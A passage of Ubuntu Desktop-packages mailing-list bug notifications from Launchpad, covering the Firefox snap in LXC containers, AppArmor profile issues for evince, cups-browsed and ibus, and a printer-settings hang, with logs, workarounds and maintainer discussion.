[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
I also see this on a 20.04 host with a 20.04 container. $ lxc version Client version: 5.0.2 Server version: 5.0.2 $ lxc launch ubuntu:20.04 foo $ lxc stop foo $ lxc config set foo security.nesting true $ lxc start foo $ lxc shell foo root@foo:~# snap install firefox error: cannot perform the following tasks: - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell": - update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gtk-doc /usr/share/gtk-doc none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/xubuntu-docs /usr/share/xubuntu-docs none bind,ro 0 0): cannot open directory "/var/lib": permission denied error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details. -) No AppArmor denials on the host or within the container. root@foo:~# journalctl -xe | cat Mar 28 14:26:26 foo snapd[196]: - Mar 28 14:26:26 foo systemd[1]: snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[370]: run-snapd-ns-firefox.mnt.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit UNIT has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[1]: run-snapd-ns-firefox.mnt.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit run-snapd-ns-firefox.mnt.mount has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[370]: snap-firefox-2487.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit UNIT has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[1]: snap-firefox-2487.mount: Succeeded. -- Subject: Unit succeeded -- Defined-By: systemd -- Support: http://www.ubuntu.com/support -- -- The unit snap-firefox-2487.mount has successfully entered the 'dead' state. Mar 28 14:26:28 foo systemd[1]: Reloading. Mar 28 14:26:28 foo systemd[1]: Cannot find unit for notify message of PID 1318, ignoring. Mar 28 14:26:29 foo snapd[196]: handlers.go:662: Reported install problem for "firefox" as Crash report successfully submitted. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu. https://bugs.launchpad.net/bugs/1994453 Title: Firefox Snap cannot be installed in an LXC Container Status in lxd: New Status in snapd: New Status in firefox package in Ubuntu: Confirmed Bug description: $ sudo snap install firefox error: cannot perform the following tasks: - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell": - update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot create directory "/usr/share/cups/doc-root": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot create directory "/usr/share/gimp/2.0": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot create directory "/usr/share/libreoffice/help": permission denied error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details. --
[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
** Also affects: snapd Importance: Undecided Status: New ** Also affects: lxd Importance: Undecided Status: New -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu. https://bugs.launchpad.net/bugs/1994453 Title: Firefox Snap cannot be installed in an LXC Container Status in lxd: New Status in snapd: New Status in firefox package in Ubuntu: Confirmed Bug description: $ sudo snap install firefox error: cannot perform the following tasks: - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell": - update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot create directory "/usr/share/cups/doc-root": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot create directory "/usr/share/gimp/2.0": permission denied update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot create directory "/usr/share/libreoffice/help": permission denied error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed. See 'journalctl -xe' for details. -) This makes it very difficult to have LXC containers with a GUI (used via VNC), as a web browser is essential. Workaround: - Add the Mozillateam PPA (https://ppa.launchpadcontent.net/mozillateam/ppa/ubuntu) - Create /etc/apt/preferences.d/mozilla-firefox with: Package: firefox* Pin: release o=LP-PPA-mozillateam Pin-Priority: 1001 - sudo apt install firefox ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: firefox 1:1snap1-0ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-48.54-generic 5.15.53 Uname: Linux 5.15.0-48-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Wed Oct 26 14:16:04 2022 InstallationDate: Installed on 2020-11-02 (722 days ago) InstallationMedia: Ubuntu-Server 18.04.4 LTS "Bionic Beaver" - Release amd64 (20200203.1) Snap.Changes: no changes found SourcePackage: firefox UpgradeStatus: Upgraded to jammy on 2022-10-03 (22 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/lxd/+bug/1994453/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1968498] [NEW] Unhandled promise rejection after screenlock/unlock
Public bug reported: After upgrading from focal to jammy, I noticed this in my logs: Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 This happens after screenlock/unlock. It looks like https://github.com/ubuntu/gnome-shell-extension- appindicator/issues/334 was filed for this as well. ** Affects: gnome-shell-extension-appindicator (Ubuntu) Importance: Undecided Status: New ** Description changed: After upgrading from focal to jammy, I noticed this in my logs: - Apr 10 14:05:40 iolanthe ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available - Apr 10 14:05:40 iolanthe gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: - _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 - _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 - _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 - AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 + Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available + Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: + _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 + _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 + _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 + AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 This happens after screenlock/unlock. It looks like https://github.com/ubuntu/gnome-shell-extension- appindicator/issues/334 was filed for this as well. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-shell-extension-appindicator in Ubuntu. https://bugs.launchpad.net/bugs/1968498 Title: Unhandled promise rejection after screenlock/unlock Status in gnome-shell-extension-appindicator package in Ubuntu: New Bug description: After upgrading from focal to jammy, I noticed this in my logs: Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise: _checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33 _nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18 _emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47 AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22 This happens after screenlock/unlock. It looks like https://github.com/ubuntu/gnome-shell
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
Olivier, yes, I shouldn't be assigned. Ian, you're right the profile is suboptimal (it's also old so likely needs updating). Do note that this is a separate named profile and evince (and if this is put in an abstraction, anything that uses the abstraction) only has the `/{,snap/core/[0-9]*/}usr/bin/snap mrCx -> snap_browser,` rule which means that it is able to run the 'snap' command (needed since everything in /snap/bin points to /usr/bin/snap) which at the time I wrote the profile meant that access to this socket was needed as part of snap run. IIRC, snapd should be protecting certain actions by uid connecting to it (eg, you are root or not), but it has been a while since I've looked at that. Evince is not a snap though so if snapd does any checks on 'is the client a snap' then those would fail and evince would be able to do whatever a non-root user could do with the 'snap' command via the socket. For snap run, we can see that the snap_browser profile limits what can be used with 'run' since (at the time I wrote the comment) 'snap run' required being able to look at the meta/snap.yaml of the specific snap. This 'works' (worked?) but is brittle since if snap run changed to lift this requirement (eg, 'snap run' just passed the name of the unresolved symlink to snapd over the socket and let snapd start the snap, perhaps via userd, etc) then this falls apart. The profile was put up as an example as what could be done at the time without any help from snapd. I never particularly cared for it cause it was brittle and not designed. I'm not sure how to fix this, but here are some thoughts: * evince is just executing stuff from /snap/bin (probably via the system's xdg-open). Assuming xdg-open, the system's xdg-open (or whatever evince is using to decide and launch the default browser) could itself be fixed in Ubuntu to launch a different command that behaved better. This wouldn't necessarily fix other distros (though this is the evince profile in Debian and Ubuntu, so *technically*, if you got this change (to presumably xdg-open) into them, you could update the evince profile in them accordingly) * In lieu of that, if the profile still worked as intended, snapd could be hardened to look to check more than if the connecting process is root or a snap; it could also see if it is running under a non-snap profile, then limit access to the socket API accordingly. This has drawbacks and could break people who have written custom profiles similar to what I presented. * I suppose an alternative approach would be to have symlinks in /snap/bin for things that are registered as browsers (or just the default browser) point to a designed snap command. Eg: /snap/bin/firefox -> /usr/bin/snap # keep the existing one too /snap/bin/default-browser-is-a-snap -> /usr/bin/snap-browser # name is illustrative, TBD Now firefox, chromium, opera, brave, etc snaps registers themselves as being capable of being a default browser with snapd, then snapd registers with the system that /snap/bin/default-browser-is-a-snap is the default browser (so system utilities like xdg-open don't need to change) and /usr/bin/snap-browser is written to be safe (eg, only able to 'snap run' the configured default browser, nothing else) and apparmor profiles are adjusted to have `/{,snap/core/[0-9]*/}usr/bin/snap-browser Uxr,` (or similar). The /snap/bin/default-browser-is-a-snap path is illustrative and there isn't really a need for it at all. Could simply perhaps have snapd register /usr/bin/snap-browser as the default browser on the system (it now needs to know what snapd configured as the default browser snap though) and forego the symlink. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in apparmor package in Ubuntu: Confirmed Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus"
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu) Assignee: Jamie Strandboge (jdstrand) => (unassigned) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in apparmor package in Ubuntu: Confirmed Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago) modified.conffile..etc.apparmor.d.abstractions.evince: [modified] mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1794064/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1897369] Re: apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE)
Till, it allows quite a few things (from man capabilities): CAP_SYS_NICE * Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes; * set real-time scheduling policies for calling process, and set scheduling policies and priorities for arbitrary processes (sched_setscheduler(2), sched_setparam(2), sched_setattr(2)); * set CPU affinity for arbitrary processes (sched_setaffinity(2)); * set I/O scheduling class and priority for arbitrary processes (io‐ prio_set(2)); * apply migrate_pages(2) to arbitrary processes and allow processes to be migrated to arbitrary nodes; * apply move_pages(2) to arbitrary processes; * use the MPOL_MF_MOVE_ALL flag with mbind(2) and move_pages(2). cups-browsed is probably just trying to renice itself, which isn't terrible for it to try, but it probably fails gracefully with this just being noise. If it does fail gracefully, you could consider an explicit deny rule to silence the log. Eg: deny capability sys_nice, That said, we've normally allowed system policy (ie, those shipped in debs) to use sys_nice if they have a legitimate use case for it. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1897369 Title: apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE) Status in cups package in Ubuntu: Confirmed Bug description: In Ubuntu 20.04.1 with *cups-browsed* 1.27.4-1, apparmor prevents `/usr/sbin/cups-browsed` to change its nice value. $ sudo dmesg | grep apparmor [541870.509461] audit: type=1400 audit(1600898428.089:60): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=62030 comm="cups-browsed" capability=23 capname="sys_nice" [628298.779668] audit: type=1400 audit(1600984854.115:61): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=66850 comm="cups-browsed" capability=23 capname="sys_nice" [714667.424963] audit: type=1400 audit(1601071220.527:62): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=76828 comm="cups-browsed" capability=23 capname="sys_nice" To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cups/+bug/1897369/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
This was fixed in snapd in 2.44 via https://github.com/snapcore/snapd/pull/8467 ** Changed in: snapd (Ubuntu) Status: In Progress => Fix Released ** Changed in: snapd (Ubuntu Focal) Status: In Progress => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu. https://bugs.launchpad.net/bugs/1871148 Title: services start before apparmor profiles are loaded Status in AppArmor: Invalid Status in snapd: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Released Status in zsys package in Ubuntu: Invalid Status in apparmor source package in Focal: Fix Released Status in snapd source package in Focal: Fix Released Status in zsys source package in Focal: Invalid Bug description: Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/. Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal: --- cannot change profile for the next exec call: No such file or directory snap-update-ns failed with code 1: File exists --- Updated to add for Jamie: $ snap version snap2.44.2+20.04 snapd 2.44.2+20.04 series 16 ubuntu 20.04 kernel 5.4.0-21-generic To manage notifications about this bug go to: https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1891338] Re: apparmor misconfigured for envice
You are right that there are two places this is defined: in /etc/apparmor.d/abstractions/ubuntu-browsers.d/ubuntu-integration and in /etc/apparmor.d/usr.bin.evince. I'll adjust apparmor to fix ubuntu-integration to use the exo-open abstraction. There is an evince task though because we don't want it to use the ubuntu-integration abstraction. Instead the exo-open stanza in the usr.bin.evince should just include the exo-open abstraction. Ie, replace this: # For Xubuntu to launch the browser /usr/bin/exo-open ixr, /usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr, /etc/xdg/xdg-xubuntu/xfce4/helpers.rc r, /etc/xdg/xfce4/helpers.rc r, with this: # For Xubuntu to launch the browser #include ** Also affects: evince (Ubuntu) Importance: Undecided Status: New ** Changed in: apparmor (Ubuntu) Status: New => In Progress ** Changed in: evince (Ubuntu) Status: New => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1891338 Title: apparmor misconfigured for envice Status in apparmor package in Ubuntu: In Progress Status in evince package in Ubuntu: Triaged Bug description: On a fully up to date xubuntu 20-04 system, when i run evince and click on a link, it fails to follow that link in my browser. This kind of thing happens when you are reading a technical paper and want to follow one of the references and click on the doi or url. When i click on the link i get a box that i cannot copy from that says: Failed to launch preferred application for category "WebBrowser". Failed to execute child process "/usr/lib/x86_64-linux-gnu/xfce4/exo-2 /exo-helper-2"(Permission denied). Did I say that it is annoying that i could not copy the text in this box!! The output of the ldd command you asked for is attached. I should also point out that this worked fine under xubuntu 18.04. I had originally posted this as an additional comment on https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1869159?comments=all but https://launchpad.net/~seb128 said that I should submit this as a separate bug because this is likely an apparmor configuration problem that is similar to the ancient bug https://bugs.launchpad.net/bugs/987578. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1891338/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
I agree that a new bug should be filed. When doing so, please attach any relevant policy violations from journalctl to the bug. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to ibus in Ubuntu. https://bugs.launchpad.net/bugs/1580463 Title: Snap blocks access to system input methods (ibus, fcitx, ...) Status in ibus: Fix Released Status in apparmor package in Ubuntu: Fix Released Status in ibus package in Ubuntu: Fix Released Status in im-config package in Ubuntu: Fix Released Status in snapd package in Ubuntu: Fix Released Status in apparmor source package in Xenial: Fix Released Status in im-config source package in Xenial: Fix Released Status in snapd source package in Xenial: Fix Released Status in apparmor source package in Yakkety: Fix Released Status in im-config source package in Yakkety: Fix Released Status in snapd source package in Yakkety: Fix Released Bug description: = SRU im-config = [Impact] ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc. The upload simply adjusts 21_ibus.rc to start ibus-daemon with "-- address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required. [Test Case] 1. start a unity session before updating to the package in -proposed 2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76 3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM 4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before 5. logout of unity, then log back in 6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e (notice '/tmp/ibus/' in the path) 7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM ... (notice '@/tmp/ibus/' in the path) In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources. Extended test case to verify input support still works in unconfined and confined applications: 1. Systems Settings Language Support, if prompted install the complete language support 2. Install Chinese (simple and traditional) 3. sudo apt-get install ibus-pinyin ibus-sunpinyin 4. logout / login 5. System Settings / Text Entry - add Chinese (Pinyin) (IBus) 6. select pinyin from the indicator 7. sudo lsof | grep ibus | grep @ # will use @/tmp/dbus-... 8. open gnome-calculator and try to type something in (should get a pop-up) 9. open evince and try to search a pdf (should get a pop up) 10. upgrade apparmor and im-config from xenial-proposed 11. logout and back in 12. sudo lsof | grep ibus | grep @ # will use @/tmp/ibus/... 13. open gnome-calculator and try to type something in (should get a pop-up) 14. open evince and try to search a pdf (should get a pop up) 15. verify no new apparmor denials [Regression Potential] The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus- daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up. This change intentionally requires a change to the unity7 snapd interface, which is in already done. This change intentionally requires a change to apparmor to add a unix rule for communicating with the new ibus address. This is in xenial- proposed 2.10.95-0ubuntu2.3 (and 2.10.95-0ubuntu2.4). The packages changes to im-config use 'Breaks: apparmor (<< 2.10.95-0ubuntu2.3) to ensure that the apparmor abstraction is updated and policy recompiled before ibus is restarted. This was omitted from the initial im-config upload which resulted in bug #1588197. Test cases ensuring this is working p
[Desktop-packages] [Bug 1881294] Re: Apparmor blocks evince GUI-Input-Dialogs
*** This bug is a duplicate of bug 1856738 *** https://bugs.launchpad.net/bugs/1856738 @Reinhard, you are now hitting bug #1856738 which prevents @{HOME} from being used in the peer_addr for an abstract socket. For now, I suggest updating /etc/apparmor.d/abstractions/ibus to have: unix (connect, receive, send) type=stream peer=(addr="@/home/teachers/*/.cache/ibus/dbus-*"), ** This bug has been marked a duplicate of bug 1856738 access always denied when using @{HOME} tunable in peer_addr for abstract socket -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1881294 Title: Apparmor blocks evince GUI-Input-Dialogs Status in evince package in Ubuntu: Invalid Bug description: Network Users (LDAP + NFS4 home) cannot interact with evince GUI- input-elements. * page navigation per number not possible * select pages to print not possible * save open PDF with different name not possible Local user on the same machine behaves as expected. apparmor messages in /var/log/syslog May 29 14:37:07 r002pc51 kernel: [15848.736916] audit: type=1400 audit(1590755827.768:827): apparmor="DENIED" operation="file_lock" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.cache/event- sound-cache.tdb.2176809057334199ab75052753e0683a.x86_64-pc-linux-gnu" pid=34988 comm="evince" requested_mask="k" denied_mask="k" fsuid=4515 ouid=4515 May 29 14:37:07 r002pc51 kernel: [15848.739259] audit: type=1400 audit(1590755827.772:828): apparmor="DENIED" operation="link" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.local/share /gvfs-metadata/.open04eaJ8" pid=34988 comm="pool-evince" requested_mask="l" denied_mask="l" fsuid=4515 ouid=4515 target="/home/teachers/ttfinr/.local/share/gvfs-metadata/home" May 29 14:37:07 r002pc51 kernel: [15848.739974] audit: type=1400 audit(1590755827.772:829): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/run/user/4515/gvfs- metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="r" denied_mask="r" fsuid=4515 ouid=4515 May 29 14:37:07 r002pc51 kernel: [15848.740088] audit: type=1400 audit(1590755827.772:830): apparmor="DENIED" operation="unlink" profile="/usr/bin/evince" name="/run/user/4515/gvfs- metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="d" denied_mask="d" fsuid=4515 ouid=4515 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1881294/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1721704] Re: Printer settings stuck on loading drivers database
@Till, the boot_id issue is being tracked here: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to system-config-printer in Ubuntu. https://bugs.launchpad.net/bugs/1721704 Title: Printer settings stuck on loading drivers database Status in apparmor package in Ubuntu: New Status in system-config-printer package in Ubuntu: Incomplete Bug description: 1) Description: Ubuntu Artful Aardvark (development branch) Release: 17.10 2) ubuntu-settings: Installed: 17.10.17 Candidate: 17.10.17 3) The printer configuration goes fine and I can print 4) Printer settings stuck on loading drivers database and finally no drivers list available. Only 'cancel' button active. Note: I'm trying to configure a Brother HL-2030 connected to Network through a FritzBox 7940 router. The printer works fine both on Fedora and macOS X systems. I opened 'System Settings', then select 'Devices' > 'Printers' > 'Add a Printer'. I entered the router address and the window shows me correctly a 'JetDirect-Printer' on 192.168.178.1. I selected the printer and pressed the 'Add' button, a window 'Select Printer Driver' appears and stuck with 'Loading drivers database...'. After about 2 minutes, stopped loading and remains blank. No drivers selection is available and I can only push the 'Cancel' button. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1721704/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : 